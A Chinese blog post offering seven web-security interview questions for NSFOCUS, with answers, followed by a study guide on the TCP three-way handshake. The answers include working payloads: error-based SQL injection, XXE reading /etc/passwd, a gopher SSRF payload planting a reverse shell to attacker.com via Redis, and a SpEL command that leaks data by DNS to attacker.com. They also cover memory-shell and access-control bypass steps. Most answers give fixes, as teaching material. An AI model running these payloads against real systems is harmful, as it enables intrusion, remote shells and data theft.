绿盟的面试题都这么难了?

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

作为网络安全中的黄埔军校,绿盟科技25届应届生已经开始招聘了,全国应该陆续放出上千个岗位,但是不少小伙伴表示,目前拿到offer也只能是实习offer,至于能不能转正,要看最终的表现。

看表现看表现,这里不用多说吧,老司机应该都懂吧,这不就是HR的说辞么,毕竟春招实习生走了还有秋招实习生呢。这不就源源不断了。

但是绿盟作为老牌网络安全公司公司整体技术氛围还是不错的,如果大家能拿到机会也还是可以去冲一下的。同事我也把群里大家说问到的面试题整理了一份在xing球

绿盟简历投递的地址

来吧看看这几道题目你会不(更多面经在星哈)

题目1:某WAF拦截了UNION SELECTinformation_schema,如何获取数据库名?
答案

  • 替代information_schema:使用sys.schema_auto_increment_columns(MySQL 5.6+);

  • 绕过UNION:利用报错注入或布尔盲注;

  • Payload示例:

' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案:使用ORM框架+参数化查询,禁用错误回显。

题目2:如何在Java反序列化漏洞中注入内存马(如Tomcat Filter型)?
答案

  1. 构造恶意Filter类:动态注册Filter,映射到/*路径;

  2. 利用反序列化链(如CC6)加载字节码(URLClassLoader或BCEL);

  3. 通过JRMP或HTTP服务传输恶意类;

  4. 触发Filter的doFilter方法执行命令。
    检测工具:Java内存马扫描工具(如scFox)。


题目3:某文件下载接口存在路径遍历漏洞(filename=../../etc/passwd),如何进一步利用实现RCE?
答案

  1. 查找Web根目录的可写路径(如/tmp、上传目录);

  2. 上传恶意文件(如JSP Webshell)到可写目录;

  3. 结合文件包含、反序列化等漏洞触发执行;

  4. 或覆盖敏感配置文件(如.htaccess)。
    修复方案:规范化路径,禁用动态文件名拼接。

题目4:某系统通过URL参数控制权限(如/admin?role=admin),如何绕过并访问管理后台?
答案

  • 参数污染:/admin?role=user&role=admin

  • 修改请求方法:GET改为POST或PUT;

  • 伪静态路径:/admin/../user/admin

  • HTTP头注入:X-Forwarded-For: 127.0.0.1
    修复方案:后端校验用户角色,而非依赖前端参数。

题目5:审计以下XML解析代码,指出漏洞及修复方案:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(input);  

答案

  • 漏洞:未禁用外部实体解析,导致XXE;

  • 利用:读取本地文件(<!ENTITY xxe SYSTEM "file:///etc/passwd">);

  • 修复

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);

题目6:如何通过SSRF漏洞攻击内网Redis未授权访问?
答案

  1. 利用Gopher协议构造Redis命令:

gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$30%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/443 0>&1%0a%0a%0a%0d%0aquit%0d%0a
  1. 写入定时任务或SSH密钥;
    修复方案:禁用非常用协议(如Gopher),限制请求目标IP。

题目7:某系统使用SpEL表达式处理用户输入,如何利用T(java.lang.Runtime).exec()实现无回显RCE?
答案

  • DNS外带数据

T(java.lang.Runtime).exec('curl ${urlencode("; whoami | xxd -p -c 32 | tr -d '\n' | xargs -I{} dig {}.attacker.com")}')
  • 修复方案:使用SimpleEvaluationContext替代StandardEvaluationContext

要全面理解TCP三次握手以及背后网络协议的原理,首先推荐详细阅读《绿盟技术面试题:客服响应、出差准备与TCP三次握手》这本书籍。该书专门针对绿盟的技术面试,深入讲解了面试中可能遇到的技术题目,包括TCP三次握手的原理和相关网络协议。 参考资源链接:[绿盟技术面试题:客服响应、出差准备与TCP三次握手](https://wenku.csdn.net/doc/794ag1hbxj?spm=1055.2569.3001.10343) 在准备过程中,建议首先从理论入手,对TCP/IP模型有一个宏观的认识,理解其层次结构以及每一层的作用。接下来,重点攻克传输层,特别是TCP协议。TCP三次握手的具体步骤包括:客户端发送一个SYN包到服务器请求建立连接;服务器收到这个SYN包后,回应一个SYN+ACK包,表示同意建立连接;客户端再次发送一个ACK包,确认连接的建立。每次握手都伴随着序列号的确认和更新,确保双方可以同步状态。 为了更好地记忆这个过程,可以制作流程图,标记出各个阶段的数据包流向、状态变化以及双方所扮演的角色。此外,通过实践加深理解也是一种有效的方法,例如使用wireshark抓包工具来观察实际的TCP握手过程,分析TCP头部信息,理解SYN、SYN+ACK、ACK等标志位的意义。 最后,为了在面试中全面掌握TCP三次握手,除了记忆理论知识外,还需要准备如何用简洁的语言解释给面试官听。例如,可以这样说:'TCP三次握手是一个建立连接的过程,通过序列号和确认号的交换,确保双方都准备好了数据的发送和接收。首先客户端发送一个带有初始序列号的SYN请求,服务器端响应一个SYN+ACK,包含自己的序列号和对客户端序列号的确认,最后客户端再发送一个ACK,确认服务器的序列号。这样,双方就成功建立了连接,并且确保了数据的有序传输。' 掌握了上述内容后,你将能够系统地理解并记忆TCP三次握手的关键步骤及其背后的网络协议原理。《绿盟技术面试题:客服响应、出差准备与TCP三次握手》不仅帮助你准备技术面试,还为你的职业发展提供了一个全面的视角。 参考资源链接:[绿盟技术面试题:客服响应、出差准备与TCP三次握手](https://wenku.csdn.net/doc/794ag1hbxj?spm=1055.2569.3001.10343)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值